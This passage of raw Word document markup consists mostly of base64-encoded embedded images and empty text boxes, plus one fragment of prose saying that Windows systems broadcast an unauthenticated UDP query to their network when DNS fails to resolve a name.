jbkAs5&#10;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&#10;3QAAAAA=&#10;">
                <v:rect id="Rectangle 511" o:spid="_x0000_s1162" style="position:absolute;width:76795;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FzFcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITxhb5p2wUWrUcRV9OiqoN4ezbMt&#10;Ni+liba7v94sCB6HmfmGmc5bU4oH1a6wrCAeRCCIU6sLzhQcD+v+CITzyBpLy6TglxzMZ93OFBNt&#10;G/6hx95nIkDYJagg975KpHRpTgbdwFbEwbva2qAPss6krrEJcFPKzyj6kgYLDgs5VrTMKb3t70bB&#10;ZlQtzlv712Tl6rI57U7j78PYK/XRaxcTEJ5a/w6/2lutYBjH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4hcxXEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>windows</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> systems when a DNS is unresolved. By issuing a unauthenticated UDP </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 512" o:spid="_x0000_s1163" style="position:absolute;top:1752;width:27602;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PtYsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITxhb5oqKFqNIrqix10rqLdH82yL&#10;zUtpsrbrr98sCB6HmfmGWaxaU4oH1a6wrGA4iEAQp1YXnCk4Jbv+FITzyBpLy6Tglxyslt3OAmNt&#10;G/6mx9FnIkDYxagg976KpXRpTgbdwFbEwbvZ2qAPss6krrEJcFPKURRNpMGCw0KOFW1ySu/HH6Ng&#10;P63Wl4N9Nln5ed2fv86zbTLzSn302vUchKfWv8Ov9kErGA9H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z7WLEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>broadcast</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> to its entire network.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 513" o:spid="_x0000_s1164" style="position:absolute;left:20756;top:1752;width:564;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9I+cYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3Wj0hJTVxG1mGObCNrbI/ua&#10;hGbfhuzWpP56t1DocZiZb5jVZjCNuFLnassKZtMIBHFhdc2lglP++hiDcB5ZY2OZFPyQg8169LDC&#10;RNue3+ma+VIECLsEFVTet4mUrqjIoJvaljh4n7Yz6IPsSqk77APcNHIeRc/SYM1hocKWdhUVX9m3&#10;UXCM2+0ltbe+bA4fx/PbebnPl16pyXjYvoDwNPj/8F871QqeZgv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b9I+cYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 514" o:spid="_x0000_s1165" style="position:absolute;top:4267;width:563;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bQjcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3Wj2BJTVxG1mGObCNrbI/ua&#10;hGbfhuzWpP56t1DocZiZb5jVZjCNuFLnassKZtMIBHFhdc2lglP++hiDcB5ZY2OZFPyQg8169LDC&#10;RNue3+ma+VIECLsEFVTet4mUrqjIoJvaljh4n7Yz6IPsSqk77APcNHIeRc/SYM1hocKWdhUVX9m3&#10;UXCM2+0ltbe+bA4fx/PbebnPl16pyXjYvoDwNPj/8F871QqeZgv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lbQjcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 515" o:spid="_x0000_s1166" style="position:absolute;top:6781;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p1FsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITxhb5q64KJdo4iu6FGtoHt7NM+2&#10;2LyUJtru/nojCB6HmfmGmc5bU4o71a6wrGA4iEAQp1YXnCk4Juv+GITzyBpLy6TgjxzMZ93OFGNt&#10;G97T/eAzESDsYlSQe1/FUro0J4NuYCvi4F1sbdAHWWdS19gEuCnlZxR9SYMFh4UcK1rmlF4PN6Ng&#10;M64W5639b7Ly53dz2p0mq2TilfrotYtvEJ5a/w6/2lutYDQcwfNMOAJy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EadRbEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 516" o:spid="_x0000_s1167" style="position:absolute;top:9296;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jrYcQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITzBm6YuKFqNIrqiR1cF9fZonm2x&#10;eSlNtNVfbxYW9jjMzDfMbNGYQjypcrllBYN+BII4sTrnVMHpuOmNQTiPrLGwTApe5GAxb7dmGGtb&#10;8w89Dz4VAcIuRgWZ92UspUsyMuj6tiQO3s1WBn2QVSp1hXWAm0J+RdFIGsw5LGRY0iqj5H54GAXb&#10;cbm87Oy7Tovv6/a8P0/Wx4lXqttpllMQnhr/H/5r77SC4WAEv2fCEZ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HI62HEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 517" o:spid="_x0000_s1168" style="position:absolute;top:11810;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RO+sYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3WjYBtTVxG1mGObCNrbI/ua&#10;hGbfhuzWpP56t1DocZiZb5jVZjCNuFLnassKZtMIBHFhdc2lglP++hiDcB5ZY2OZFPyQg8169LDC&#10;RNue3+ma+VIECLsEFVTet4mUrqjIoJvaljh4n7Yz6IPsSqk77APcNHIeRU/SYM1hocKWdhUVX9m3&#10;UXCM2+0ltbe+bA4fx/PbebnPl16pyXjYvoDwNPj/8F871QoWs2f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oRO+sYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 518" o:spid="_x0000_s1169" style="position:absolute;top:14325;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vaiMIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/6HZQredGPBkkRXEavo0SYF29uQHZPQ&#10;7GzIrib217uHQo+P973aDKYRd+pcbVnBfBaBIC6srrlU8JkfpjEI55E1NpZJwYMcbNbj0QpTbXv+&#10;oHvmSxFC2KWooPK+TaV0RUUG3cy2xIG72s6gD7Arpe6wD+Gmka9R9CYN1hwaKmxpV1Hxk92MgmPc&#10;br9O9rcvm/338XK+JO954pWavAzbJQhPg/8X/7lPWsFiHtaGM+EI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G9qIwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 519" o:spid="_x0000_s1170" style="position:absolute;top:16840;width:563;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d/E8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQYvCMBSE74L/ITxhb5q64GKrUcRV9OiqoN4ezbMt&#10;Ni+liba7v94sCB6HmfmGmc5bU4oH1a6wrGA4iEAQp1YXnCk4Htb9MQjnkTWWlknBLzmYz7qdKSba&#10;NvxDj73PRICwS1BB7n2VSOnSnAy6ga2Ig3e1tUEfZJ1JXWMT4KaUn1H0JQ0WHBZyrGiZU3rb342C&#10;zbhanLf2r8nK1WVz2p3i70PslfrotYsJCE+tf4df7a1WMBrG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XfxPEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
